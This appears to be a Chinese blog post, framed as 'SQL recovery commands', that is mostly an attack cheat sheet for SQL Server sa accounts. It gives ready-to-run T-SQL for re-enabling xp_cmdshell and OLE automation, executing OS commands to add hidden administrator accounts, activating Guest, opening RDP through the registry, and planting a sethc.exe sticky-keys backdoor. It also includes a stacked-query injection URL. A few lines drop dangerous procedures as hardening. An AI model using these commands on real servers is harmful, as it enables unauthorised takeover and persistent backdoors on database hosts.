dnnnet

导航

SQL恢复命令(超全)

SQL恢复命令(超全)2009-08-29 09:48突破SA的各种困难: ========================================================================================== xp_cmdshell相关: 未能找到存储过程'master..xpcmdshell'. 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5键命令执行完毕 ------------------------------------------------------------------------------------------ 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'然后按F5键命令执行完毕 ------------------------------------------------------------------------------------------ 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ------------------------------------------------------------------------------------------ 恢复xp_cmdshell xp_cmdshell,sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', ------------------------------------------------------------------------------------------ xp_cmdshell新的恢复办法: (这样可以直接恢复,不用去管sp_addextendedproc是不是存在) 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' ------------------------------------------------------------------------------------------ 恢复 dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") ------------------------------------------------------------------------------------------ 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' ------------------------------------------------------------------------------------------ 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' ------------------------------------------------------------------------------------------ 开启cmdshell的sql语句 exec sp_adde xtendedproc xp_cmdshell ,@dllname ='xplog70.dll' ------------------------------------------------------------------------------------------ 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok ------------------------------------------------------------------------------------------ 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok ------------------------------------------------------------------------------------------ xplog7.0.dll解决方法 ========================================================================================== exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll' 解决方法: 你要先删除存储过程, use master EXEC sp_dropextendedproc 'xp_cmdshell' 然后上传xplog70.dll到某个目录,例如C盘根目录,然后执行 use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll') ------------------------------------------------------------------------------------------ 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell ========================================================================================= sql server 2005下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; ------------------------------------------------------------------------------------------ SQL2005开启'OPENROWSET'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; ------------------------------------------------------------------------------------------ SQL2005开启'sp_oacreate'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; ========================================================================================= 去除SA的xp_cmdshell权限如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句: use master sp_dropextendedproc 'xp_cmdshell' xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。 sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll ========================================================================================== 删除sql危险存储: DROP PROCEDURE sp_makewebtask exec master..sp_dropextendedproc xp_cmdshell exec master..sp_dropextendedproc xp_dirtree exec master..sp_dropextendedproc xp_fileexist exec master..sp_dropextendedproc xp_terminate_process exec master..sp_dropextendedproc sp_oamethod exec master..sp_dropextendedproc sp_oacreate exec master..sp_dropextendedproc xp_regaddmultistring exec master..sp_dropextendedproc xp_regdeletekey exec master..sp_dropextendedproc xp_regdeletevalue exec master..sp_dropextendedproc xp_regenumkeys exec master..sp_dropextendedproc xp_regenumvalues exec master..sp_dropextendedproc sp_add_job exec master..sp_dropextendedproc sp_addtask exec master..sp_dropextendedproc xp_regread exec master..sp_dropextendedproc xp_regwrite exec master..sp_dropextendedproc xp_readwebtask exec master..sp_dropextendedproc xp_makewebtask exec master..sp_dropextendedproc xp_regremovemultistring exec master..sp_dropextendedproc sp_OACreate DROP PROCEDURE sp_addextendedproc ========================================================================================== 恢复sql危险存储 use master exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' exec sp_addextendedproc xp_dirtree,'xpstar.dll' exec sp_addextendedproc xp_enumgroups,'xplog70.dll' exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' exec sp_addextendedproc xp_loginconfig,'xplog70.dll' exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' exec sp_addextendedproc sp_OACreate,'odsole70.dll' exec sp_addextendedproc sp_OADestroy,'odsole70.dll' exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAMethod,'odsole70.dll' exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' exec sp_addextendedproc sp_OAStop,'odsole70.dll' exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' exec sp_addextendedproc xp_regread,'xpstar.dll' exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' exec sp_addextendedproc xp_regwrite,'xpstar.dll' exec sp_addextendedproc xp_availablemedia,'xpstar.dll' ========================================================================================== 其他综合类 ------------------------------------------------------------------------------------------ SQL Server 阻止了对组件 'Ole Automation Procedures' 的 过程'sys.sp_OAMethod' sp_configure 'show advanced options', 1; GO RECONFIGURE; GO sp_configure 'Ole Automation Procedures', 1; GO RECONFIGURE; GO EXEC sp_configure 'Ole Automation Procedures'; GO ------------------------------------------------------------------------------------------ SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问 ;EXEC sp_configure 'show advanced options', 1 -- ;RECONFIGURE WITH OVERRIDE -- ;EXEC sp_configure 'xp_cmdshell', 1 -- ;RECONFIGURE WITH OVERRIDE -- ;EXEC sp_configure 'show advanced options', 0 -- ------------------------------------------------------------------------------------------ 找不到存储过程 sp_addextendedproc create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ ========================================================================================== 漏洞修补类 ------------------------------------------------------------------------------------------ 一.更改sa口令方法: 用sql综合利用工具连接后,执行命令: exec sp_password NULL,'新密码','sa' (提示:慎用!) ----------------------------------------------------------------------------------------- 二.简单修补sa弱口令: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' ========================================================================================= 终极加用户方法 ------------------------------------------------------------------------------------------ 2000servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add' ------------------------------------------------------------------------------------------ declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' ------------------------------------------------------------------------------------------ xp或2003server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add' ------------------------------------------------------------------------------------------ 或者可以 declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX为你要执行的命令 ------------------------------------------------------------------------------------------ declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'net user 新用户 密码 /add & net localgroup administrators 123 /add' EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user 新用户 密码 /add")'); Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 新用户 /add")'); Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup Remote Desktop Users 123 /add")'); ------------------------------------------------------------------------------------------ 恢复xp_cmdshell(好像需要重启)先尝试恢复xp_cmdshell,sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',结果发现xpsql70.dll被删除。 然后写vbs文件到启动组里面: declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'set wshshell=createobject("wscript.shell")' exec @ret = sp_oamethod @f, 'writeline', NULL, 'a=wshshell.run ("cmd.exe /c net user 新用户 密码 /add",0)' exec @ret = sp_oamethod @f, 'writeline', NULL, 'b=wshshell.run ("cmd.exe /c net localgroup administrators 新用户 /add",0)' ------------------------------------------------------------------------------------------ 突破xplog70.dll declare @cmd INT exec sp_oacreate 'wscript.shell',@cmd output exec sp_oamethod @cmd,'run',null,'net user 用户名 密码 /add','0','true' declare @cmd INT exec sp_oacreate 'wscript.shell',@cmd output exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用户名 /add','0','true' ------------------------------------------------------------------------------------------ 激活Guest。 eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes' --激活GUEST用户。 declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add' --把Guest加到管理组 ------------------------------------------------------------------------------------------ 系统管理员帐号 exec master..sp_addlogin 用户名 密码 exec master..sp_addsrvrolemember 用户名,sysadmin 添加数据库帐号,sysadmin是最高权限 ------------------------------------------------------------------------------------------ 常用SQL提权方法: exec xp_cmdshell 'net user 用户名 密码 /add' exec xp_cmdshell 'net localGroup Administrators 用户名 /add' ------------------------------------------------------------------------------------------ ========================================================================================== 查看3389端口 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' 开启3389 master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;-- syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;-- ========================================================================================== 复制文件粘贴后门 declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'c:\windows\system32\cmd.exe /c copy C:\WINDOWS\system32\taskmgr.exe c:\windows\system32\sethc.exe' declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'c:\windows\system32\cmd.exe /c copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe' ------------------------------------------------------------------------------------------ declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; =========================================================================================== 查看目录 exec master.dbo.xp_subdirs 'c:\' 列出磁盘 exec master..xp_fixeddrives

posted on 2010-11-14 11:23  sjgkkk  阅读(562)  评论(0编辑  收藏  举报